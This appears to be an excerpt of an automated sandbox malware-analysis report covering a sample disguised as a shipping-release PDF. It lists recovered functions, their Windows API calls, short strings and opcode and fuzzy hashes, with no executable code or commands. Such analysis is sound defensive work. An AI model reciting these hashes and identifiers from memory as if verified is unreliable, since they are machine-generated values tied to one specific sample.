Instruction Fuzzy Hash: 3821C4B59002489FDB10CFAAD584ADEBFF9FB48310F14841AE918A7350D378A944CFA5

Function 00ADB0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB11E

Memory Dump Source

Source File: 00000000.00000002.2086010823.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f36a5193c3063d025dcb33c1a82484a47dfabe4d443187a460012d205116994e
Instruction ID: 089554048a5cc21aa48810af77083ed8196d38525f945441da8c9898df2162b3
Opcode Fuzzy Hash: f36a5193c3063d025dcb33c1a82484a47dfabe4d443187a460012d205116994e
Instruction Fuzzy Hash: DB11DFB5C002498FCB10DF9AD848B9EFBF4EB88314F11851AD419A7310D379A545CFA1

Function 089688D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00E46428,?,?,?,?,?,?,0896A0B0,00000000,00000000,?), ref: 0896A25D

Memory Dump Source

Source File: 00000000.00000002.2089808015.0000000008960000.00000040.00000800.00020000.00000000.sdmp, Offset: 08960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8960000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: b0408955ef533a5e250a0c8bb67071cca4fcebbdc88ac21370269cb403e4f40f
Instruction ID: 190e9c69f668d2050a1a7bfdd71e2d0e3b3a760b39d34bdf432fa6b3e2a75aec
Opcode Fuzzy Hash: b0408955ef533a5e250a0c8bb67071cca4fcebbdc88ac21370269cb403e4f40f
Instruction Fuzzy Hash: 9A11F2B58003489FDB10DF9AC849BDEBBF8FB48320F10845AE518B7200D379A954CFA5

Function 0896A1F8 Relevance: 1.5, APIs: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00E46428,?,?,?,?,?,?,0896A0B0,00000000,00000000,?), ref: 0896A25D

Memory Dump Source

Source File: 00000000.00000002.2089808015.0000000008960000.00000040.00000800.00020000.00000000.sdmp, Offset: 08960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8960000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: f356b4529ce4afc4816a5cc9e0c3dc1b63b96938d14659e0e70bf9dd25fd19f1
Instruction ID: 9318540001b0bc2cd380c099d7fd24950953605d619ba115c38d02a006ab5de1
Opcode Fuzzy Hash: f356b4529ce4afc4816a5cc9e0c3dc1b63b96938d14659e0e70bf9dd25fd19f1
Instruction Fuzzy Hash: 4E11F5B58002499ECB10DF99D885BDEBBF4FB48320F10845AE558A7211C379A554CFA1

Function 04F91B60 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

Te]q, xrefs: 04F91CC1

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: cda56b7dc45d0d5c61051864070bd1826cddd8e8b473f92657a869fc50c65eaf
Instruction ID: 58703d5a831f0113ee06bf87e30bc0bdafe9fd69325d1e76b4315c681f5a24f6
Opcode Fuzzy Hash: cda56b7dc45d0d5c61051864070bd1826cddd8e8b473f92657a869fc50c65eaf
Instruction Fuzzy Hash: 7F51BF31B002468FEF15DFB999448BFBBF6EFC9220B158969E419DB351EB309D068790

Function 04F9F870 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

(aq, xrefs: 04F9F901

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: a3a8adf300d4b35dceb14023722eede970bbfd67762c271315b75b64f84c646d
Instruction ID: fc4f32cd547dfa62ff6f71a0528fc9a7f32822283a243f1bdd3b1ea50a1efa09
Opcode Fuzzy Hash: a3a8adf300d4b35dceb14023722eede970bbfd67762c271315b75b64f84c646d
Instruction Fuzzy Hash: 8A411331B042504FEF59AB3DD85417E7AD6AFC5710B2844ADD906CB395DE24ED03C7A1

Function 06B60040 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

(aq, xrefs: 06B601DD

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 847a76f570d5b326a7c473e46783ae266b120be148892b1a2ee239fbcd1ffd5d
Instruction ID: dec05dfb47045420d6ef2cee2641cfd1c21b4515d420af7ffb76b694c17aa6bf
Opcode Fuzzy Hash: 847a76f570d5b326a7c473e46783ae266b120be148892b1a2ee239fbcd1ffd5d
Instruction Fuzzy Hash: 3B41B371A01205AFCB54EF6AC954AAEBBE6EF88300F108469F8069B390DF78DD41CB50

Function 06B6E377 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

p7]z, xrefs: 06B6E7EA

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: p7]z
API String ID: 0-3566876590
Opcode ID: eaea5e195c13eb835390ea718b8b4b010e194408b5de2a12511028768c91a8e3
Instruction ID: 1a2d7c500a42ddb3f52f951d8effdf2c2fd573720a488baffc31319ac44eba59
Opcode Fuzzy Hash: eaea5e195c13eb835390ea718b8b4b010e194408b5de2a12511028768c91a8e3
Instruction Fuzzy Hash: B7416DFC90A204CFD7A1EF6DD1449AD7BBAFB49341B10A0A5F10A9B626D738D842CF50

Function 06B6ACBF Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

Te]q, xrefs: 06B6ADB3

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: f67f4e5695fd96081bc95c33730340f6e12c572c1125bcf016129a038f0b549b
Instruction ID: 59ef6a27e588cca3a5d4048b1222de17223846e494be7d2c3b3db81fcb9ca699
Opcode Fuzzy Hash: f67f4e5695fd96081bc95c33730340f6e12c572c1125bcf016129a038f0b549b
Instruction Fuzzy Hash: C33190B4E00219CFDF48CFA9D9849ADBBB5FF48310F20816AE916AB351D7359945CF50

Function 06B66130 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

8aq, xrefs: 06B6619C

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: 27668999c2b8433fb55940d529c233c30ba9bc8eb37f8b888b9818d6dfd4c7ef
Instruction ID: 129237f19eb34df312567e37c3853a5865ed976230ec65bbbe497584d4286b6d
Opcode Fuzzy Hash: 27668999c2b8433fb55940d529c233c30ba9bc8eb37f8b888b9818d6dfd4c7ef
Instruction Fuzzy Hash: 7C110AB5B04214CFDB849F799854A7A7BF6EB89301B1444BAE606DB392FA34CD018793

Function 06B6AC41 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

Te]q, xrefs: 06B6AD55

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 0802c5af760d1993c2751b0e94312ca080aa4ff1904781c718cbf95cbd4f8aa2
Instruction ID: a63ea5cce12756483215141742bdddf4a03e07914db794be7a406cb6340198e6
Opcode Fuzzy Hash: 0802c5af760d1993c2751b0e94312ca080aa4ff1904781c718cbf95cbd4f8aa2
Instruction Fuzzy Hash: 512116B4E0464C8FDB48CFAAC9546DEBBF6BF89300F14C02AD419AB359DB345806CB90

Function 06B6AC50 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Te]q, xrefs: 06B6AD55

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 460334162497baae6d69c0343de9c6ce0ad70323904619dd6c94d82eabf84c17
Instruction ID: b2c4fdb19e04201dccf65681316ffde7bbea7d53906c6e58d5b8841a529f9e7d
Opcode Fuzzy Hash: 460334162497baae6d69c0343de9c6ce0ad70323904619dd6c94d82eabf84c17
Instruction Fuzzy Hash: 3A21F3B5E046088BDB48CFAAC9546DEBBF6BF89300F14C02AD419AB358DB745806CB80

Function 04F91678 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Te]q, xrefs: 04F916E3

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: dd50fb0ba056514ea7203c436fd5394c47cf3943d48f7ffb06efb72e54d5cdf2
Instruction ID: 37a7d4362381c38a8a17d155e78fe347c274faabe795b46a1fa0c6e9f3cf0b5e
Opcode Fuzzy Hash: dd50fb0ba056514ea7203c436fd5394c47cf3943d48f7ffb06efb72e54d5cdf2
Instruction Fuzzy Hash: 09114C35F0020A8BEB44EFB99A115EEB6F6AFD8750B104479C419E7244EF359D03CBA6

Function 08951BF8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 08951C50

Memory Dump Source

Source File: 00000000.00000002.2089778305.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8950000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9c57d36933e3d74a3862bda31753e45dea01b8cc8e18cdef5c16a4ec7112d5ca
Instruction ID: c2d5ab9e1268a9cc389c128fbd7eaa3617f57046d2612185bf8b1a103a248bc2
Opcode Fuzzy Hash: 9c57d36933e3d74a3862bda31753e45dea01b8cc8e18cdef5c16a4ec7112d5ca
Instruction Fuzzy Hash: 961103B58003498FCB20DF9AC585BDEBBF4EB48320F10841AD958A7240D739A584CFA5

Function 08951BF0 Relevance: 1.3, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 08951C50

Memory Dump Source

Source File: 00000000.00000002.2089778305.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8950000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 71a28cbd1d9adee96c4d32dee0504f17e78186e8ef99f40e182bb3414fc15817
Instruction ID: 76e8aabadb66e433274db673a35ba5521cfe8dd67265d19c1d482086c4620e6f
Opcode Fuzzy Hash: 71a28cbd1d9adee96c4d32dee0504f17e78186e8ef99f40e182bb3414fc15817
Instruction Fuzzy Hash: 3211F2B5800649CFCB10DF99C685BEEBBF4FF48324F24841AD958A7241D339A584CFA5

Function 06B6E8A6 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

p7]z, xrefs: 06B6E7EA

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: p7]z
API String ID: 0-3566876590
Opcode ID: 10474969c065dc23e5d885d76ef99baa68f5a7779c1d9f6a3d067871552f5954
Instruction ID: 85b1b05d0f3c72bb68c1c6a511f96c3f7c535456d3d9f04ecb3b631232f2835e
Opcode Fuzzy Hash: 10474969c065dc23e5d885d76ef99baa68f5a7779c1d9f6a3d067871552f5954
Instruction Fuzzy Hash: 45114FB8946204CFDB50DF68D954AADBBBAFF85300F1052E5E50997615D7349D42CF40

Function 06B6E2DF Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

p7]z, xrefs: 06B6E7EA

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID: p7]z
API String ID: 0-3566876590
Opcode ID: 62de3322751953935b10677926db03ffe83d00a95f13c10850d689889392a4d8
Instruction ID: 4728155eecec11c7b0a8e0cb9e92f8e8a4bcfa2667ec759c7118dc1dfae7a6af
Opcode Fuzzy Hash: 62de3322751953935b10677926db03ffe83d00a95f13c10850d689889392a4d8
Instruction Fuzzy Hash: 02111BB8905204CFD754DF69E1849ADBBBAFF49341B1091A9F40A9B616CB349902CF40

Function 04F9D2E8 Relevance: .7, Instructions: 726COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c13c97a4294c42c40fb89a60380f89846dc70987272077ae27a9f6135bf6ea5
Instruction ID: 321d0120ff6357640f9d37c8b21c1b52480ebd111138b87f5ea3bc904402f0ba
Opcode Fuzzy Hash: 5c13c97a4294c42c40fb89a60380f89846dc70987272077ae27a9f6135bf6ea5
Instruction Fuzzy Hash: 60723D35900609CFDF14EF68C898AADB7B1FF45305F148299D549A7265EF30AACACF81

Function 04F9A330 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5521c11b19bfce065bd7076b0523bba9d38563113fd640fe35d66cb72dc3e78f
Instruction ID: 7e1a98ba64cbd5abe07f30e70143c9dde65fbab1838a7d7a473bb51b58892e4b
Opcode Fuzzy Hash: 5521c11b19bfce065bd7076b0523bba9d38563113fd640fe35d66cb72dc3e78f
Instruction Fuzzy Hash: 3F42D631E0065ACBDF15DF68C8846DDB7B1BF89304F1186A9D459BB261EB30AE86CF40

Function 04F9EB88 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2608ec94a7757eb4059bf9cd355427b39332dd2fa7259119f18d37d293040185
Instruction ID: 1bf2bb2b70ec4b52dd0a283014bc9f71c0c3d08cc83bf7050938cd35ae57f0da
Opcode Fuzzy Hash: 2608ec94a7757eb4059bf9cd355427b39332dd2fa7259119f18d37d293040185
Instruction Fuzzy Hash: EF221934A00215CFEB14EF69C894A9DB7F2FF88304F1585A9D40AAB3A5DB31AD46CF50

Function 04F9A2C0 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf26690c30570f55182e865a90cc377991e00d9ce1d4da971bd96073fb93c47
Instruction ID: ea0d4ec97254d4835184367e7619064d15f505f172ad13a273852a62e47a0469
Opcode Fuzzy Hash: abf26690c30570f55182e865a90cc377991e00d9ce1d4da971bd96073fb93c47
Instruction Fuzzy Hash: 07E1D731E00659CBEF25DF68C8946EDB7F1BF49304F1186A9D459BB261EB30AD86CB40

Function 04F9A320 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c422d597d9b30fcad54bc15a3ae4e51da07057450b09696b99a710eccd70b228
Instruction ID: 1cb53bae53d2c25458477e34969eb135e32c5acd2ee3159cb15df1010ad3af5f
Opcode Fuzzy Hash: c422d597d9b30fcad54bc15a3ae4e51da07057450b09696b99a710eccd70b228
Instruction Fuzzy Hash: B5E1D731E00659CBEF25DF68C8846EDB7F1BF49304F1186A9D459BB261EB30AD86CB40

Function 06B630F0 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd5f30a74b24d79fa8709fce9f602d656a647cdb4f5093ab4f5222497341c38
Instruction ID: d1f9255964d7fb50ac2d025dd5611c67b1402e492d84653ea6a988338ce37791
Opcode Fuzzy Hash: cdd5f30a74b24d79fa8709fce9f602d656a647cdb4f5093ab4f5222497341c38
Instruction Fuzzy Hash: 91F1CB71D1061A8FCF50DFA4C954AEDB7B5FF98300F1096AAE50977214EB70AA85CF90

Function 06B630DF Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3225df30023d0b92f2472deda016a15e7859da2106ac4bffef04d55a02b281
Instruction ID: fc3f42223214886d040996501817fa1ee8c3b399d6577503ec293124572f84a3
Opcode Fuzzy Hash: cd3225df30023d0b92f2472deda016a15e7859da2106ac4bffef04d55a02b281
Instruction Fuzzy Hash: 55E1DA71D1061A8FCF50DFA8C9549EDB7B5FF98300F1096AAD509B7214EB70AA85CF90

Function 04F91B30 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd02eb4219265c0d5096da51affca048d3a04abe51e8c7aa1f95ac9d1986f2f5
Instruction ID: d999830f76d935defe8980c8bf7b0a487e262664e9407f07f26a5bdf24a7b8f8
Opcode Fuzzy Hash: dd02eb4219265c0d5096da51affca048d3a04abe51e8c7aa1f95ac9d1986f2f5
Instruction Fuzzy Hash: 3AC15135B007018FDB04EF79D89469977A2FF88304F158979D90AAB3A6DF70E84ACB51

Function 06B63700 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cb3d7e8b7782e0e525422fe8efffaee856ad00ec10e8c36f06991634868a6f
Instruction ID: 38df5a42abb7c76d598c0e735d77a9959e982dd937909cdcbf8155322399f5c7
Opcode Fuzzy Hash: d5cb3d7e8b7782e0e525422fe8efffaee856ad00ec10e8c36f06991634868a6f
Instruction Fuzzy Hash: DAC16C71E002198FDF54EF69C8446ADB7F2BF85304F1495A9E406AB251EB34AE85CB90

Function 04F9E7C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01537687b31381a28bd5621036ceedc60a74e922509041edf48e2f145d897178
Instruction ID: e161541ff5eff6ac0b3c614be52dd6f96327a2a744eb52d07360f4e9498e5395
Opcode Fuzzy Hash: 01537687b31381a28bd5621036ceedc60a74e922509041edf48e2f145d897178
Instruction Fuzzy Hash: F8C1F234E10619CFDB14DF69C884A9CB7F1FF89304F1586A9D449AB261EB30AE86CF51

Function 04F94037 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d3af143e50e26bf471924deff3bd1351970eacbd2df3e29f13e5a3cc0f9dd1
Instruction ID: 6ee5ba3a9c3305647cbebb722b058decec1454014a0bbb673a28395350d04809
Opcode Fuzzy Hash: 36d3af143e50e26bf471924deff3bd1351970eacbd2df3e29f13e5a3cc0f9dd1
Instruction Fuzzy Hash: 90A16F35B007018BDB04EF79D8947A977A2FF88304F158579D90AAB3A6DF71AC4ACB50

Function 04F9E790 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fdb5f40a0703a7ec335d59a99f2c13469320a5a2002e3939c8be6561c01052
Instruction ID: 09a64483d39e42d6c95a72f2fb1927f8a778ace20b7b9757689d4e49d66d13d9
Opcode Fuzzy Hash: 42fdb5f40a0703a7ec335d59a99f2c13469320a5a2002e3939c8be6561c01052
Instruction Fuzzy Hash: ADA1F435E00619CFDB14DF68C884A98B7B1FF89304F1586A9D449AB361EB71AE86CF41

Function 04F92C98 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438cb81e4c6aec33a0674d054b17a012aa2240ae95f2f8936cee2435ddd08209
Instruction ID: 861688aff50e23650157cd6aa496955a59ee74dfdb29565f712778b7a7f45331
Opcode Fuzzy Hash: 438cb81e4c6aec33a0674d054b17a012aa2240ae95f2f8936cee2435ddd08209
Instruction Fuzzy Hash: E7A1E375D01228DFDF24CFA8C884BDDBBB2BF49305F1084A9D409A7251DB75AA86CF50

Function 06B62380 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41ee24fe84b89448bfc58736bf6d1388a81fbc2fa88243b5d9e6832ddc13d7a
Instruction ID: 0210afce6b2ed3b938d8ede1351829e17af736c325409df09f72f39bdbd112dd
Opcode Fuzzy Hash: a41ee24fe84b89448bfc58736bf6d1388a81fbc2fa88243b5d9e6832ddc13d7a
Instruction Fuzzy Hash: 4B81E770E10219DFEF50EF69D9586ECBBB0FF44300F1140A9E545AB2A4EB74DA65CB81

Function 04F9CCB8 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586cf7a61c2f3bdeba46d1d0833de22a22a0a37bfe8dbe81d7303c4042e0004b
Instruction ID: b28f5822acad888efd89202400c2b4e49d8fc56785fba35dbc2765ec71e73ed0
Opcode Fuzzy Hash: 586cf7a61c2f3bdeba46d1d0833de22a22a0a37bfe8dbe81d7303c4042e0004b
Instruction Fuzzy Hash: F591E87591070ADFCB01EF68C880999FBF5FF49310B14C79AE819AB255EB70E985CB90

Function 06B67B59 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e391b42f537d8e17b203c3ee971cfd7e70c61ccc5f39adcf8138e7a56dfd6f
Instruction ID: b1adf901ebdbd48e3b1a7231f8fca4514656aa5c4af813fdc78f4b70d1a12096
Opcode Fuzzy Hash: b1e391b42f537d8e17b203c3ee971cfd7e70c61ccc5f39adcf8138e7a56dfd6f
Instruction Fuzzy Hash: 608191B0E041588FDB54CFAAC5906AEBBF1FF45304F2484AAE5569B345DB34DC42CB91

Function 04F9FA18 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0213c9d942f6ebc15a51e5da060f2657c5d72ee976e497d4d047adaa18b3b4ae
Instruction ID: 32832e3c37453bba0ca9f6b162fd8151a8c2dea354a42eb5ccf5de539abf9733
Opcode Fuzzy Hash: 0213c9d942f6ebc15a51e5da060f2657c5d72ee976e497d4d047adaa18b3b4ae
Instruction Fuzzy Hash: 1E615D31B002159FEF15DF68C85499DB7F2BF88318B144569E406DB364EB31EC42CB90

Function 04F9BC38 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
